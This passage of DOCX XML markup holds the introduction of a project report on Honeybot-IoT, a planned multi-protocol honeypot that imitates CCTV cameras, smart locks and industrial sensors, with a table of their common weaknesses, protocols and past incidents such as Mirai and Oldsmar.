            <wp:extent cx="762000" cy="615950"/>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762000" cy="615950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>_______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473BB4CA" w14:textId="5E0F479F" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc229436411"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internet of Things (IoT) refers to a network of connecting billions of devices in the form of CCTV cameras, smart locks, biometric systems, smart bulbs, and industrial sensors. This type of device improves automation and efficiency in their operations, but they are a security risk because they are vulnerable to weaknesses in design such as weak credentials, out-of-date and unencrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E655B" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-World Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD32AD3" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In 2016, the Mirai botnet attack highlighted the potential vulnerability of the compromised IoT devices even to the largest and most popular services such as Twitter, Netflix, and Reddit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EC787" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages of existing Honeypots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Low-interaction honeypots are unrealistically vulnerable to attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84D8A7" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Single protocols or devices are usually the only supported honeypots of high-level interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F783D3B" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proposed Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B14A9" w14:textId="50A7C88E" w:rsidR="00240A5B" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Honeybot-IoT will simulate a variety of IoT scenarios and protocols, be stateful, and be served in detached Docker containers that are safe to replicate the behavior of an attacker and generate actionable threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F56A75" w14:textId="77777777" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA1F7D1" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2 Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD088F" w14:textId="4B3238D9" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Security researchers and SOC (Security Operations Centre) teams lack a high-interaction, multi-protocol honeypot specifically designed for the three most exploited IoT device categories — CCTV cameras, smart locks, and industrial sensors — that can simultaneously capture attacker behavior across multiple protocols, automatically classify threats, and present actionable intelligence through a real-time dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526293A3" w14:textId="77777777" w:rsidR="00F0564A" w:rsidRPr="00240A5B" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4642BD32" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2.1 Why These Three Devices?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22668864" w14:textId="77777777" w:rsidR="00F0564A" w:rsidRPr="00240A5B" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371709CB" w14:textId="56E8072F" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Devices</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9329"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394"/>
        <w:gridCol w:w="2192"/>
        <w:gridCol w:w="2052"/>
        <w:gridCol w:w="2691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="081CBC1E" w14:textId="77777777" w:rsidTr="00F0564A">
        <w:trPr>
          <w:trHeight w:val="202"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0960FCA9" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IoT Device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C99C89" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why Targeted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19871601" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocols Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E63DCDB" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Real-World Incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="46B3EDF6" w14:textId="77777777" w:rsidTr="00F0564A">
        <w:trPr>
          <w:trHeight w:val="202"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5169766E" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CCTV Camera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F14841" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Default credentials, exposed RTSP </w:t>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">streams, globally scanned by Shodan and Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246DCDD7" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>RTSP, HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="237E7DFC" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mirai Botnet (2016), Verkada Breach (2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="3D0DC90C" w14:textId="77777777" w:rsidTr="00F0564A">
        <w:trPr>
          <w:trHeight w:val="42"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBCBFCB" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Smart Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0716CF40" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Weak authentication, predictable access tokens, credential brute-force target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11199183" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SSH, MQTT, HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CEFF81A" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Ring Device Attacks (2019-2023)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="2DFE375D" w14:textId="77777777" w:rsidTr="00F0564A">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54E6B5C3" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Industrial Sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31D7E2F7" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>No authentication, cleartext MQTT and Telnet, critical infrastructure exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422AF180" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>MQTT, Telnet, HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="047F9831" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Oldsmar Water Plant Attack (2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFF8A67" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9001" w:name="_Toc69001"/>
      <w:r>
        <w:t xml:space="preserve">1.6 Modules Covered in This Document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9001"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
